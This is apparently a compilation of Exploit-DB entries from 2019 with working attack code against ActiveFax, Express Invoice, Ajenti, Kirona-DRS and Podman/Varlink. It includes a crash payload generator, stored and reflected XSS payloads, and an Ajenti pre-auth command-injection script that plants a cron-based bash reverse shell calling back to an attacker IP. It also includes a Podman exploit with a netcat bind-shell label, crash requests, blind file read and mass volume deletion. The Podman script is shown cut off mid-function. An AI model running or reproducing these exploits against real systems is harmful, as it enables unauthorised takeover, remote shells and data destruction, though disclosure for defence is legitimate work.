  1. # Exploit Title: ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service # Date: 2019-10-12 # Vendor Homepage: https://www.actfax.com/ # Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe # Exploit Author: Achilles # Tested Version: 6.92 # Tested on: Windows 7 x64 # Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow # Steps to Produce the Crash: # 1.- Run python code : ActiveFax_Server.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open ActiveFaxServer.exe # 4.- Open the Pop3 Server Config # 5.- Press New # 6.- Paste the content of EVIL.txt into the field: 'POP3 Server Address and Login and Password' # 7.- Press ok Twice # 8.- And you will see a crash. #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"
  2. # Exploit Title: Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting # Exploit Author: Debashis Pal # Date: 2019-10-13 # Vendor Homepage: https://www.nchsoftware.com/ # Source: https://www.nchsoftware.com/invoice/index.html # Version: Express Invoice v7.12 # CVE : N/A # Tested on: Windows 7 SP1(32bit) # About Express Invoice v7.12 ============================== Express Invoice lets you create invoices you can print, email or fax directly to clients for faster payment. # Vulnerability ================ Persistent (stored) cross-site scripting (XSS). A value entered by a low-privilege user into the Customer / Item / Customer Name fields is stored and later rendered unescaped to every user who views the affected list, including privileged users, so an unprivileged account can execute script in an administrator's session. The leading </script> in the payload suggests the stored value is emitted inside an inline script block rather than only as HTML text; confirm this against the response when reproducing. # PoC ====== 1. Log in as an authenticated unprivileged user to the Express Invoice 7.12 web-enabled service, i.e. http://A.B.C.D:96 [default installation]. 2. Under "Invoices": Invoices List -> View Invoices -> Add New Invoice -> Customer field: put </script><script>alert('XSS');</script> and save the change. Or under "Items": Items -> Add New Item -> Item field: put </script><script>alert('XSS');</script> and save the change. Or under "Customers": Customers -> Add New Customer -> Customer Name: put </script><script>alert('XSS');</script> and save the change. Or under "Quotes": Quotes -> View Quotes -> Add New Quote -> Customer: put </script><script>alert('XSS');</script> and save the change. 3. Log in as any authenticated user (privileged or unprivileged) to the Express Invoice v7.12 web-enabled service and visit any of the Invoices/Items/Customers/Quotes sections; the persistent XSS payload will execute. # Disclosure Timeline ====================== Vulnerability Discovery Date: 12-Sep-2019. Vulnerability notification to vendor via vendor-provided web form: 12-Sep-2019, 13-Sep-2019, 19-Sep-2019, 26-Sep-2019; no response. Submitted to exploit-db: 14-Oct-2019. # Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
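# Title: Ajenti 2.1.31 - Remote Code Execution
# Author: Jeremy Brown
# Date: 2019-10-13
# Software Link: https://github.com/ajenti/ajenti
# CVE: N/A
# Tested on: Ubuntu Linux
#!/usr/bin/env python3
# (the code below uses urllib.request, so it is Python 3 only; the original
#  shebang pointed at an unversioned `python`)
# ajentix.py
#
# Ajenti Remote Command Execution Exploit
#
# -------
# Details
# -------
#
# Ajenti is a web control panel written in Python and AngularJS.
#
# One can locally monitor executed commands on the server while testing
#
# $ sudo ./exec-notify (google for "exec-notify.c", modify output as needed)
# sending proc connector: PROC_CN_MCAST_LISTEN... sent
# Reading process events from proc connector.
# Hit Ctrl-C to exit
#
# Browse over to https://server:8000/view/login/normal to login
#
# .....
# pid=9889 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - test ]
# pid=9889 executed [/bin/su -c /bin/echo SUCCESS - test ]
#
# Modified the JSON request username value to be `id`
#
# pid=7514 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - `id` ]
# pid=7516 executed [id ]
# pid=7514 executed [/bin/su -c /bin/echo SUCCESS - uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) ]
#
# *ACK.....*
#
# The trace above is the whole bug: the unauthenticated login handler
# interpolates the submitted username into a `/bin/sh -c` string, so the
# shell expands backticks before su ever sees a user name. Commands run as
# the ajenti-panel worker's user (nobody in this test), pre-authentication.
#
# Also the login routine times out after 5 seconds (see auth.py), which
# makes an interactive shell relatively ephemeral. So, we cron job.
#
# $ python3 ajentix.py server.ip shell local-listener.ip
# Done!
#
# $ nc -v -l -p 5555
# Listening on [0.0.0.0] (family 0, port 5555)
# Connection from server.domain 41792 received!
# bash: cannot set terminal process group (18628): Inappropriate ioctl for device
# bash: no job control in this shell
# nobody@server:/var/spool/cron$ ps
# PID TTY TIME CMD
# 6386 ? 00:00:00 /usr/local/bin/ <-- ajenti-panel worker
# 18849 ? 00:00:00 sh
# 18851 ? 00:00:00 bash
# 18859 ? 00:00:00 ps
#
#
# Tested Ajenti 2.1.31 on Ubuntu 18.04, fixed in 2.1.32
#
# Fix commit: https://github.com/ajenti/ajenti/commit/7aa146b724e0e20cfee2c71ca78fafbf53a8767c
#
#
import os
import sys
import ssl
import json
import urllib.request as request

AJENTI_PORT = 8000      # default ajenti-panel HTTPS port
CALLBACK_PORT = 5555    # port the 'shell' cron job connects back to
HTTP_TIMEOUT = 15       # seconds; the server-side login times out after ~5 s anyway


def build_username(cmd, callback_ip=None, callback_port=CALLBACK_PORT):
    """Return the 'username' value that Ajenti <= 2.1.31 will shell-expand.

    cmd: a shell command, or the literal 'shell' to install a crontab entry
         that spawns a bash reverse shell to ``callback_ip``:``callback_port``
         every minute (the login times out after ~5 s, so a one-shot shell
         would die almost immediately).
    Raises ValueError when 'shell' is requested without ``callback_ip``.
    """
    if cmd == 'shell':
        if not callback_ip:
            raise ValueError("need ip to connect back to for shell")
        return ("`echo \"* * * * * bash -i >& /dev/tcp/" + callback_ip + "/"
                + str(callback_port) + " 0>&1\" > /tmp/cronx; crontab /tmp/cronx`")
    return "`" + cmd + "`"


def build_auth_body(username):
    """Return the UTF-8 JSON body for POST /api/core/auth.

    The password is irrelevant: the command runs while the server builds the
    su command line, before authentication succeeds or fails.
    """
    body = json.dumps({'username': username, 'password': 'test', 'mode': 'normal'})
    return body.encode('utf-8')


def send_auth(host, payload, port=AJENTI_PORT, timeout=HTTP_TIMEOUT):
    """POST ``payload`` to https://host:port/api/core/auth and return the HTTP status.

    Certificate verification is deliberately disabled because Ajenti ships a
    self-signed certificate; this uses the public ssl API rather than the
    private ssl._create_unverified_context(). Content-Length is computed by
    urllib, so it is no longer set by hand. urllib/ssl/socket errors propagate.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    url = "https://%s:%d/api/core/auth" % (host, port)
    req = request.Request(url, data=payload,
                          headers={'Content-Type': 'application/json; charset=utf-8'})
    with request.urlopen(req, context=ctx, timeout=timeout) as resp:
        return resp.status


def main():
    """CLI entry point: ``ajentix.py <host> "<cmd>"`` or ``ajentix.py <host> shell <ip>``."""
    # The original tested ``len(sys.argv) < 2`` and then read sys.argv[2], so
    # ``ajentix.py host`` died with IndexError instead of printing usage.
    if len(sys.argv) < 3:
        print("Usage: %s <host> [\"cmd\" or shell...ip]\n" % sys.argv[0])
        print("Eg: %s 1.2.3.4 \"id\"" % sys.argv[0])
        print("... %s 1.2.3.4 shell 5.6.7.8\n" % sys.argv[0])
        return

    host = sys.argv[1]
    cmd = sys.argv[2]
    callback_ip = sys.argv[3] if len(sys.argv) > 3 else None

    try:
        username = build_username(cmd, callback_ip)
    except ValueError as error:
        print("Error: %s" % error)
        return

    try:
        send_auth(host, build_auth_body(username))
    except Exception as error:   # URLError, HTTPError, ssl.SSLError, socket timeouts
        print("Error: %s" % error)
        return
    print("Done!")


if __name__ == '__main__':
    main()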
  4. # Exploit Title: Kirona-DRS 5.5.3.5 - Information Disclosure # Discovered Date: 2019-10-03 # Shodan Search: /opt-portal/pages/login.xhtml # Exploit Author: Ramikan # Vendor Homepage: https://www.kirona.com/products/dynamic-resource-scheduler/ # Affected Version: DRS 5.5.3.5; other versions may also be affected. # Tested On Version: DRS 5.5.3.5 on PHP/5.6.14 # Vendor Fix: Unknown # CVE: CVE-2019-17503, CVE-2019-17504 # Category: Web Apps # Reference : https://github.com/Ramikan/Vulnerabilities/blob/master/Kirona-DRS 5.5.3.5 Multiple Vulnerabilities # Description: # The application is vulnerable to HTML injection, reflected cross-site scripting and sensitive data disclosure. # Vulnerability 1: HTML injection and reflected XSS (CVE-2019-17504) # An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. A reflected cross-site scripting (XSS) # vulnerability allows remote attackers to inject arbitrary web script via the /osm/report/ 'password' parameter. The login page echoes the submitted value back, unescaped, into the single-quoted value='...' attribute of a hidden input (see the responses below); the leading single quote closes the attribute and the rest of the payload is parsed as markup. Note that the POST body sends 'password' twice: PHP keeps the last occurrence of a repeated key, which is why the payload rather than the empty first value is reflected. The responses also carry 'Access-Control-Allow-Origin: *', which is worth recording during the assessment. Affected URL: /osm/report/ Affected Parameter: password POST Request: POST /osm/report/ HTTP/1.1 Host: 10.50.3.148 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 147 Connection: close Referer: https://10.50.3.148/osm/report/ Upgrade-Insecure-Requests: 1 create=true&password=&login=admin&password='<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!-- Response: HTTP/1.1 200 OK Date: Thu, 03 Oct 2019 14:56:05 GMT Server: Apache X-Powered-By: PHP/5.6.14 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: X-Requested-With XDomainRequestAllowed: 1 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Thu, 03 Oct 2019 14:56:05 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Length: 728 Connection: close 
Content-Type: text/html;charset=UTF-8 <html> <head> <img src='logo.jpg'> <form method='POST'> <input type='hidden' name='create' value='true'/> <input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/> <table> <tr><td>Login:</td><td><input type='login' name='login'/></td></tr> <tr><td>Password:</td><td><input type='password' name='password'/></td></tr> <tr><td colspan='2'><input type='submit' value='Login'/> </td></tr> </table> </form> </head> </html> GET Request: GET https://10.0.1.110/osm/report/?password=%27%3C%22%20%3E%3C%3Ch1%3EHTML%20Injection-heading%20tag%20used%3C/h1%3E%3Cscript%3Ealert(%22This%20is%20Cross%20Site%20Scripting%22)%3C/script%3E%3C!-- HTTP/1.1 Host: vs-kdrs-l-01.selwoodhousing.local User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 200 OK Date: Thu, 03 Oct 2019 14:53:35 GMT Server: Apache X-Powered-By: PHP/5.6.14 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: X-Requested-With XDomainRequestAllowed: 1 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Thu, 03 Oct 2019 14:53:35 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Length: 728 Connection: close Content-Type: text/html;charset=UTF-8 <html> <head> <img src='logo.jpg'> <form method='POST'> <input type='hidden' name='create' value='true'/> <input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/> <table> <tr><td>Login:</td><td><input type='login' name='login'/></td></tr> <tr><td>Password:</td><td><input type='password' name='password'/></td></tr> <tr><td colspan='2'><input type='submit' value='Login'/> </td></tr> </table> 
</form> </head> </html> *************************************************************************************************************************** Vulnerability 2: Source code and sensitive data disclosure (CVE-2019-17503) *************************************************************************************************************************** An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly: it is an installation batch script whose SQL statements contain sensitive information about the database. The file exposes the database product and version (a MySQL Server 5.6 / MariaDB install path), table names (asp_custom_action, asp_custom_tab) and their column names, the fact that each customer account maps to its own schema (%ACCOUNT%.<table>), the web-root layout (APACHE\htdocs\osm\...), and -- because it loads conf\default.txt, CUSTOM\CONF\custom.txt and conf\settings.txt as key=value settings before passing %MYSQL_LOGIN%, %MYSQL_PASSWORD% and %MYSQL_TCP_PORT% on the mysql command line -- it tells an attacker exactly which configuration files hold the database credentials and port. Affected URL: /osm/REGISTER.cmd or /osm_tiles/REGISTER.cmd # Request: GET /osm/REGISTER.cmd HTTP/1.1 Host: 10.0.0.148 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 200 OK Date: Thu, 03 Oct 2019 09:23:54 GMT Server: Apache Last-Modified: Tue, 07 Nov 2017 09:27:52 GMT ETag: "1fc4-55d612f6cae13" Accept-Ranges: bytes Content-Length: 8132 Connection: close @echo off set DEBUGMAPSCRIPT=TRUE rem rem Find root path and batch name rem root path is found relative to the current batch name rem rem turn to short filename (remove white spaces) for %%i in (%0) do ( set SHORT_MAPSCRIPTBATCH_FILE=%%~fsi set MAPSCRIPTBATCH_FILE=%%~i ) for %%i in (%SHORT_MAPSCRIPTBATCH_FILE%) do ( set MAPSCRIPTROOTDIR=%%~di%%~pi..\..\.. 
) if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTROOTDIR=%MAPSCRIPTROOTDIR% if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTBATCH_FILE=%MAPSCRIPTBATCH_FILE% rem rem find if we are in INTERRACTIVE mode or not and check the parameters rem if "%1"=="" goto INTERACTIVE goto NONINTERRACTIVE :NONINTERRACTIVE rem non interractive call so catch the parameters from command line rem this is supposed to be called from the root DRS directory if "%2"=="" ( echo Invalid parameter 2 pause goto :EOF ) set ACCOUNT=%2 set STATIC=NO if "%1"=="STATIC" set STATIC=YES if "%DEBUGMAPSCRIPT%"=="TRUE" echo Command line mode %STATIC% %ACCOUNT% if "%1"=="STATIC" goto GLOBAL if "%1"=="DYNAMIC" goto GLOBAL echo Invalid parameter 1 pause goto :EOF :INTERACTIVE rem Interractive mode : ask for account and static mode if "%DEBUGMAPSCRIPT%"=="TRUE" echo Interractive mode echo Open Street Map setup for Xmbrace DRS set /P ACCOUNT=Account name: set /P STATIC=Limited map feature (YES/NO): rem back to the setup directory cd %MAPSCRIPTROOTDIR% rem # READ AND DEFINE SETTINGS for /F "tokens=1,* delims==" %%k in (conf\default.txt) do ( if not "%%k"=="#=" set %%k=%%l ) if exist CUSTOM\CONF\custom.txt ( for /F "tokens=1,* delims==" %%k in (CUSTOM\CONF\custom.txt) do ( if not "%%k"=="#=" set %%k=%%l ) ) for /F "tokens=1,* delims==" %%k in (conf\settings.txt) do ( if not "%%k"=="#=" set %%k=%%l ) if "%APACHE_USE_SSL%"=="TRUE" ( set DEFAULT_HTTP_PROTOCOL=https set APACHE_USE_SSL_VALUE=true set DEFAULT_HTTP_PORT=%APACHE_HTTPS_PORT% ) else ( set DEFAULT_HTTP_PROTOCOL=http set APACHE_USE_SSL_VALUE=false set DEFAULT_HTTP_PORT=%APACHE_HTTP_PORT% ) goto GLOBAL rem rem good to go in a non interractive mode rem the following is the generic par of the install, whatever we are in static or dynamic mode rem :GLOBAL if "%DEBUGMAPSCRIPT%"=="TRUE" echo Global section set MYSQL="MYSQL\MySQL Server 5.6 MariaDB\bin\mysql.exe" echo delete from %ACCOUNT%.asp_custom_action where CA_CAPTION in ('Show on map','Closest')> req.sql %MYSQL% 
mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo delete from %ACCOUNT%.asp_custom_tab where NAME='Map'> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql set INSERTFIELDS=%ACCOUNT%.asp_custom_action (CA_CAPTION,CA_VIEW,CA_MODE,CA_LIST_MODE,CA_HEIGHT,CA_WIDTH,CA_RESIZABLE,CA_NEED_REFRESH,CA_PROFILES,CA_URL,CA_CUSTOM_TAB,CA_TRIGGER_MODE) if "%STATIC%"=="YES" goto :STATIC goto :DYNAMIC :STATIC if "%DEBUGMAPSCRIPT%"=="TRUE" echo Static section echo map=static > ACCOUNTS\%ACCOUNT%\config.txt echo ^<?php $staticMap=true; ?^>>APACHE\htdocs\osm\mode.php echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Journey on map','workerView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql if exist req.sql del req.sql goto FINAL :DYNAMIC if "%DEBUGMAPSCRIPT%"=="TRUE" echo Dynamic section echo map=dynamic > ACCOUNTS\%ACCOUNT%\config.txt echo ^<?php $staticMap=false; ?^>>APACHE\htdocs\osm\mode.php echo insert into %INSERTFIELDS% values ('Show on map','jobList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on 
map','jobView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Closest','jobList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Closest','jobView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','workerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','workerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','mandatory',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql rem %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','customerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% 
--verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','customerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','planning','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql set INSERTFIELDS=%ACCOUNT%.asp_custom_tab (NAME,POSITION,ADMIN,URL,WIDTH,HEIGHT) echo insert into %INSERTFIELDS% values ('Map',0,'false','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%','100%%','100%%')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql if exist req.sql del req.sql goto FINAL :FINAL echo Map registred for %ACCOUNT% if "%1"=="" pause goto :EOF
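# Exploit Title: Podman & Varlink 1.5.1 - Remote Code Execution
# Exploit Author: Jeremy Brown
# Date: 2019-10-15
# Vendor Homepage: https://podman.io/
# Software Link: dnf install podman or https://github.com/containers/libpod/releases
# Version: 1.5.1
# Tested on: Fedora Server 30
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
#
# pickletime.py
#
# Podman + Varlink Insecure Config Remote Exploit
#
# -------
# Details
# -------
#
# Podman is container engine / platform similar to Docker supported
# by RedHat and Fedora with Varlink being a protocol to exchange
# messages, which comes in handy for things like a Remote API.
#
# Now depending on how Podman and Varlink are deployed, they can be
# susceptible to local and remote attacks. There are a few API bugs
# in Podman itself, as well as a way to execute arbitrary commands if
# one can hit Podman via the Remote API. Running Podman with Varlink
# over tcp listening either on localhost or the network interface is the
# most vulnerable setup, but other ways such as access via the local UNIX
# socket or over SSH (key /w no passphrase is common) aren't likely
# to be vulnerable unless ACLs or other stuff is broken.
#
# NOTE(review): the Varlink TCP listener has no authentication of its own,
# so every action below is pre-auth for anyone who can reach the port; the
# "exploit" is the exposure, not a memory-safety bug (the two DoS cases aside).
#
# ------------------
# Testing the issues
# ------------------
#
# - check; just connects and issues GetInfo() to see if the host is
# running a podman service
#
# - exec; arbitrary cmd execution via ContainerRunlabel() specified
# by "run" label in the specified hosted image (self-setup)
#
# - dos; crash the server via choosing a /random/ selection from
# the available parsing bugs in APIs (we like to have fun here)
#
# - blind; dir traversal in SearchImages() API to force server to
# read an arbitrary file (no client-side output)
#
# - volrm; loops to remove all volumes via VolumeRemove() behavior
#
# ---------
# Exec demo
# ---------
#
# $ ./pickletime.py check tcp:podman-host:6000
# -> Podman service confirmed on host
#
# Then create a Dockerfile with an edgy label, build and host it.
#
# [Dockerfile]
# FROM busybox
# LABEL run="nc -l -p 10000 -e /bin/bash"
#
# $ ./pickletime.py exec tcp:podman-host:6000 docker-registry:5000/image run
# Done!
#
# $ nc podman-host 10000
# ps
# PID TTY TIME CMD
# 111640 pts/1 00:00:00 bash
# 111786 pts/1 00:00:00 podman
# 111797 pts/1 00:00:00 nc
# 111799 pts/1 00:00:00 bash
# 111801 pts/1 00:00:00 ps
#
#
# Tested Podman 1.4.4/1.5.1 and Varlink 18 on Fedora Server 30 x64
#
# -----------
# Other stuff
# -----------
#
# Note: admins can really setup their connection and deployment configuration
# however they like, so it's hard to say how many folks are 'doing it wrong'
# or actually are running with proper auth and hardening in place. Shodan
# folks have been contacted about adding support to discover Varlink services
# to get more data that way as well.
#
# Fixed bugs:
# - DoS #2 was fixed in 1.5.1
# - Updated security docs / cli flags TBD
#
# > Why pickles? Why not.
#
# Dependencies to run this code:
#
# sudo dnf install -y python3-podman-api
#
#
#
import os
import sys
import socket
import subprocess
import random
import json
import pickle
import time

# `podman` (python3-podman-api) is imported lazily inside main(): only the
# client-based calls need it, and keeping it out of module scope lets the
# protocol helpers below be imported and tested without the package.

serviceName = 'io.podman'   # Varlink interface every method name is prefixed with
SOCKET_TIMEOUT = 10         # seconds before a raw-socket connect/send gives up


def _parse_address(address):
    """Return (host, port) for ``tcp:HOST:PORT`` or (path, None) for ``unix:PATH``.

    The original indexed ``address.split(':')`` blindly, so ``podman-host:6000``
    (the form the header examples used) or a ``unix:`` URI died with
    IndexError/ValueError. Raises ValueError with a readable message instead.
    """
    scheme, _, rest = address.partition(':')
    if scheme == 'tcp':
        host, sep, port = rest.rpartition(':')
        if not sep or not host or not port.isdigit():
            raise ValueError("expected tcp:HOST:PORT, got %r" % address)
        return host, int(port)
    if scheme == 'unix' and rest:
        return rest, None
    raise ValueError("unsupported address %r (use tcp:HOST:PORT or unix:PATH)" % address)


def _varlink_call(method, parameters):
    """Serialise one Varlink request: compact JSON followed by the NUL terminator.

    Varlink frames each message with a trailing 0x00 byte. json.dumps escapes
    quotes and backslashes; the original concatenated values into a JSON
    template by hand, so an image name or label containing '"' produced a
    malformed message.
    """
    payload = {'method': method, 'parameters': parameters}
    return json.dumps(payload, separators=(',', ':')) + '\0'


def _do_check(pman):
    """GetInfo() through the client library; report whether Podman answered."""
    result = json.dumps(pman.system.info())
    if 'podman_version' in result:
        print("-> Podman service confirmed on host")
    else:
        print("-!- Podman service was not found on host")


def _do_exec(pman, host, port, image, label):
    """Pull ``image`` then have the server run the command stored in its ``label``.

    ContainerRunlabel() executes the image's LABEL value on the host; that is
    the RCE primitive. The python client has no binding for it, so the call
    goes over a raw socket.
    """
    try:
        pman.images.pull(image)                      # PullImage()
    except Exception as error:
        # Pull fails when the image already exists locally, which is fine;
        # say so instead of swallowing it silently like the original did.
        print("[!] pull(%s) failed, continuing: %s" % (image, error))
    message = _varlink_call(serviceName + '.ContainerRunlabel',
                            {'Runlabel': {'image': image, 'label': label}})
    doSocketSend(host, port, message)


def _do_dos(host, port):
    """Send one of the two known parser-crashing requests, picked at random."""
    bug = random.randint(1, 2)
    if bug == 1:
        print("one")
        message = _varlink_call(serviceName + '.LoadImage', {'source': 'test'})
    else:
        # Crashes 1.4.4; fixed in 1.5.1 ("DoS #2" in the header).
        print("two")
        message = _varlink_call(serviceName + '.ImportImage',
                                {'reference': 'b' * 238,
                                 'source': '/dev/null'})   # must exist on the server
    doSocketSend(host, port, message)


def _do_blind(host, port):
    """Path traversal in SearchImages(): the server opens an arbitrary file.

    Nothing comes back to the client (the original confirmed the read with
    strace on the server: openat(AT_FDCWD, "/etc/passwd", ...)), so this is
    a blind read, interesting but not useful on its own.
    """
    query = '../../../etc/passwd/'   # trailing '/' is what makes the traversal take effect
    message = _varlink_call(serviceName + '.SearchImages', {'query': query})
    # pman.images.search(query) does not reproduce this; the raw call is required.
    doSocketSend(host, port, message)


def _do_volrm(host, port, rounds=10, pause=0.5):
    """Call VolumeRemove() with an empty volume name ``rounds`` times.

    Not a parsing bug: an empty name removes volumes in alphabetical order,
    so repeating the call deletes them one by one, without any auth.
    Create a few volumes with CreateVolume() first to observe it.
    """
    message = _varlink_call(serviceName + '.VolumeRemove',
                            {'options': {'volumes': ['']}})
    for _ in range(rounds):
        doSocketSend(host, port, message)
        time.sleep(pause)   # give the server time to process the previous removal


def main():
    """CLI: pickletime.py <action> <tcp:HOST:PORT|unix:PATH> [action params]."""
    # The original tested ``< 2`` and then read sys.argv[2], so a lone action
    # argument crashed with IndexError instead of printing usage.
    if len(sys.argv) < 3:
        print("Usage: %s <action> <host> [action....params]\n" % sys.argv[0])
        print("Eg: %s check tcp:podman-host:6000" % sys.argv[0])
        print("... %s exec tcp:podman-host:6000 docker-registry:5000/image run\n" % sys.argv[0])
        print("Actions: check, exec, dos, blind, volrm\n")
        return

    action = sys.argv[1]
    address = sys.argv[2]   # tcp:HOST:PORT, or unix:/run/podman/io.podman for local testing
    try:
        host, port = _parse_address(address)
    except ValueError as error:
        print("Error: %s" % error)
        return

    image = label = None
    if action == 'exec':
        # The original checked ``< 4`` but then read sys.argv[4].
        if len(sys.argv) < 5:
            print("Error: need more args for exec (image and label)")
            return
        image = sys.argv[3]   # 'source' for PullImage()
        label = sys.argv[4]

    isItTime()

    try:
        import podman   # python3-podman-api
    except ImportError:
        print("Error: python3-podman-api is not installed (sudo dnf install -y python3-podman-api)")
        return
    try:
        pman = podman.Client(uri=address)
    except Exception:   # the client raises assorted socket/varlink errors
        print("Error: can't connect to host")
        return

    if action == 'check':
        _do_check(pman)
        return
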